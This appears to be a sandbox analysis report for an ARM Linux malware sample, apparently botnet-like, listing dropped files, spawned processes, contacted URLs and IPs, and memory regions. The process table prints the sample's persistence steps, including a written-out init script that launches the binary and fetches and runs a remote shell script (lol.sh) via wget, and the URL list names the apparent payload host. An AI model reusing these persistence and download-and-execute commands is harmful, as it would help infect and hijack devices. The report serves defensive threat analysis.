Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm5.nn-20241122-0008.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm5.nn-20241122-0008.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.Vo6agL (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm5.nn-20241122-0008.elf
|
/tmp/arm5.nn-20241122-0008.elf
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn-20241122-0008.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn-20241122-0008.elf'\n
/tmp/arm5.nn-20241122-0008.elf &\n wget eqqm7,,.60+.10+.+4-, -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh
&\n ;;\n stop)\n echo 'Stopping arm5.nn-20241122-0008.elf'\n killall arm5.nn-20241122-0008.elf\n ;;\n restart)\n
$0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" >
/etc/init.d/arm5.nn-20241122-0008.elf"
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm5.nn-20241122-0008.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm5.nn-20241122-0008.elf
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm5.nn-20241122-0008.elf /etc/rc.d/S99arm5.nn-20241122-0008.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm5.nn-20241122-0008.elf /etc/rc.d/S99arm5.nn-20241122-0008.elf
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/tmp/arm5.nn-20241122-0008.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/lib/systemd/systemd-user-runtime-dir
|
/lib/systemd/systemd-user-runtime-dir stop 127
|
There are 47 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
96.116.142.3
|
unknown
|
United States
|
||
|
64.204.91.158
|
unknown
|
United States
|
||
|
4.225.166.13
|
unknown
|
United States
|
||
|
144.195.83.213
|
unknown
|
United States
|
||
|
148.184.142.149
|
unknown
|
United States
|
||
|
213.96.249.206
|
unknown
|
Spain
|
||
|
108.193.186.221
|
unknown
|
United States
|
||
|
203.46.59.1
|
unknown
|
Australia
|
||
|
222.105.238.92
|
unknown
|
Korea Republic of
|
||
|
41.157.7.139
|
unknown
|
South Africa
|
||
|
35.121.196.140
|
unknown
|
United States
|
||
|
16.74.48.13
|
unknown
|
United States
|
||
|
156.32.205.214
|
unknown
|
United States
|
||
|
120.46.33.63
|
unknown
|
China
|
||
|
158.167.106.103
|
unknown
|
Luxembourg
|
||
|
137.221.242.86
|
unknown
|
United Kingdom
|
||
|
49.166.157.223
|
unknown
|
Korea Republic of
|
||
|
196.50.54.57
|
unknown
|
Gabon
|
||
|
31.6.101.145
|
unknown
|
Russian Federation
|
||
|
29.169.61.53
|
unknown
|
United States
|
||
|
221.122.154.254
|
unknown
|
China
|
||
|
176.203.173.169
|
unknown
|
Qatar
|
||
|
167.2.233.41
|
unknown
|
United States
|
||
|
96.235.71.59
|
unknown
|
United States
|
||
|
201.75.169.236
|
unknown
|
Brazil
|
||
|
192.83.133.136
|
unknown
|
United States
|
||
|
166.185.192.82
|
unknown
|
United States
|
||
|
30.254.87.226
|
unknown
|
United States
|
||
|
62.75.83.6
|
unknown
|
Greece
|
||
|
94.58.86.228
|
unknown
|
United Arab Emirates
|
||
|
114.239.133.94
|
unknown
|
China
|
||
|
220.249.175.246
|
unknown
|
China
|
||
|
202.167.154.33
|
unknown
|
Singapore
|
||
|
155.71.130.116
|
unknown
|
Australia
|
||
|
76.182.14.73
|
unknown
|
United States
|
||
|
57.157.49.79
|
unknown
|
Belgium
|
||
|
28.12.47.3
|
unknown
|
United States
|
||
|
200.254.149.207
|
unknown
|
Brazil
|
||
|
28.120.184.151
|
unknown
|
United States
|
||
|
163.111.194.38
|
unknown
|
France
|
||
|
219.45.7.6
|
unknown
|
Japan
|
||
|
87.194.239.63
|
unknown
|
United Kingdom
|
||
|
25.214.190.223
|
unknown
|
United Kingdom
|
||
|
14.119.90.9
|
unknown
|
China
|
||
|
143.58.166.100
|
unknown
|
United States
|
||
|
35.89.183.103
|
unknown
|
United States
|
||
|
147.154.211.97
|
unknown
|
United States
|
||
|
43.167.172.30
|
unknown
|
Japan
|
||
|
32.193.207.51
|
unknown
|
United States
|
||
|
45.38.214.15
|
unknown
|
United States
|
||
|
136.47.194.158
|
unknown
|
United States
|
||
|
88.139.164.30
|
unknown
|
France
|
||
|
75.168.106.176
|
unknown
|
United States
|
||
|
82.61.3.74
|
unknown
|
Italy
|
||
|
17.78.247.206
|
unknown
|
United States
|
||
|
42.107.201.20
|
unknown
|
India
|
||
|
84.13.240.71
|
unknown
|
United Kingdom
|
||
|
88.148.101.105
|
unknown
|
Spain
|
||
|
97.194.97.5
|
unknown
|
United States
|
||
|
74.100.163.48
|
unknown
|
United States
|
||
|
212.40.125.214
|
unknown
|
Hungary
|
||
|
56.66.61.58
|
unknown
|
United States
|
||
|
218.156.158.255
|
unknown
|
Korea Republic of
|
||
|
70.139.104.226
|
unknown
|
United States
|
||
|
145.131.215.193
|
unknown
|
Netherlands
|
||
|
56.149.11.74
|
unknown
|
United States
|
||
|
44.39.146.85
|
unknown
|
United States
|
||
|
89.177.84.107
|
unknown
|
Czech Republic
|
||
|
213.107.47.70
|
unknown
|
United Kingdom
|
||
|
43.201.74.246
|
unknown
|
Japan
|
||
|
193.23.88.225
|
unknown
|
Germany
|
||
|
135.144.104.11
|
unknown
|
United States
|
||
|
198.8.35.145
|
unknown
|
United States
|
||
|
108.8.86.237
|
unknown
|
United States
|
||
|
209.56.136.118
|
unknown
|
United States
|
||
|
57.253.132.56
|
unknown
|
Belgium
|
||
|
197.88.141.55
|
unknown
|
South Africa
|
||
|
152.43.210.172
|
unknown
|
United States
|
||
|
22.124.77.226
|
unknown
|
United States
|
||
|
47.158.251.198
|
unknown
|
United States
|
||
|
121.119.224.23
|
unknown
|
Japan
|
||
|
97.122.199.138
|
unknown
|
United States
|
||
|
114.211.8.17
|
unknown
|
China
|
||
|
223.104.69.110
|
unknown
|
China
|
||
|
160.178.160.254
|
unknown
|
Morocco
|
||
|
103.89.213.180
|
unknown
|
China
|
||
|
62.188.34.92
|
unknown
|
United Kingdom
|
||
|
27.154.247.9
|
unknown
|
China
|
||
|
219.147.77.213
|
unknown
|
China
|
||
|
2.55.19.221
|
unknown
|
Israel
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
150.87.32.67
|
unknown
|
Japan
|
||
|
96.221.53.240
|
unknown
|
United States
|
||
|
153.28.54.239
|
unknown
|
United States
|
||
|
142.205.177.219
|
unknown
|
Canada
|
||
|
67.68.46.201
|
unknown
|
Canada
|
||
|
93.230.169.163
|
unknown
|
Germany
|
||
|
153.209.73.157
|
unknown
|
Japan
|
||
|
137.140.87.250
|
unknown
|
United States
|
||
|
64.189.249.216
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7f6c94031000
|
page execute read
|
|
||
|
7f6c94031000
|
page execute read
|
|
||
|
55efb8ad5000
|
page read and write
|
|||
|
7f6d9b447000
|
page read and write
|
|||
|
7f6c9403e000
|
page read and write
|
|||
|
55efb8884000
|
page execute read
|
|||
|
7ffd108ee000
|
page execute read
|
|||
|
7f6d9b99c000
|
page read and write
|
|||
|
7f6d9b2b8000
|
page read and write
|
|||
|
7f6d9ac59000
|
page read and write
|
|||
|
7f6d9b447000
|
page read and write
|
|||
|
7f6d9b629000
|
page read and write
|
|||
|
7f6d93fff000
|
page read and write
|
|||
|
7f6d9a451000
|
page read and write
|
|||
|
7f6d9ac59000
|
page read and write
|
|||
|
55efb8ad5000
|
page read and write
|
|||
|
7f6d9b04d000
|
page read and write
|
|||
|
55efbaaf3000
|
page read and write
|
|||
|
7f6d9b99c000
|
page read and write
|
|||
|
7f6d94021000
|
page read and write
|
|||
|
7f6d9b04d000
|
page read and write
|
|||
|
7f6d9b933000
|
page read and write
|
|||
|
55efb8884000
|
page execute read
|
|||
|
55efb8ade000
|
page read and write
|
|||
|
7f6d93fff000
|
page read and write
|
|||
|
7ffd10844000
|
page read and write
|
|||
|
7f6d9aceb000
|
page read and write
|
|||
|
7ffd10844000
|
page read and write
|
|||
|
7f6c9403a000
|
page read and write
|
|||
|
7f6d9b2db000
|
page read and write
|
|||
|
7f6d94021000
|
page read and write
|
|||
|
7ffd108ee000
|
page execute read
|
|||
|
55efbb863000
|
page read and write
|
|||
|
7f6d9b80a000
|
page read and write
|
|||
|
55efbaadc000
|
page execute and read and write
|
|||
|
7f6c9403a000
|
page read and write
|
|||
|
55efbb863000
|
page read and write
|
|||
|
7f6d9aceb000
|
page read and write
|
|||
|
7f6d9b2b8000
|
page read and write
|
|||
|
7f6d9b957000
|
page read and write
|
|||
|
55efb8ade000
|
page read and write
|
|||
|
55efbaaf3000
|
page read and write
|
|||
|
7f6d9b80a000
|
page read and write
|
|||
|
7f6d9b957000
|
page read and write
|
|||
|
7f6d9a451000
|
page read and write
|
|||
|
7f6c9403e000
|
page read and write
|
|||
|
55efbaadc000
|
page execute and read and write
|
|||
|
7f6d9b629000
|
page read and write
|
|||
|
7f6c94043000
|
page read and write
|
|||
|
7f6d9b2db000
|
page read and write
|
|||
|
7f6d9b933000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.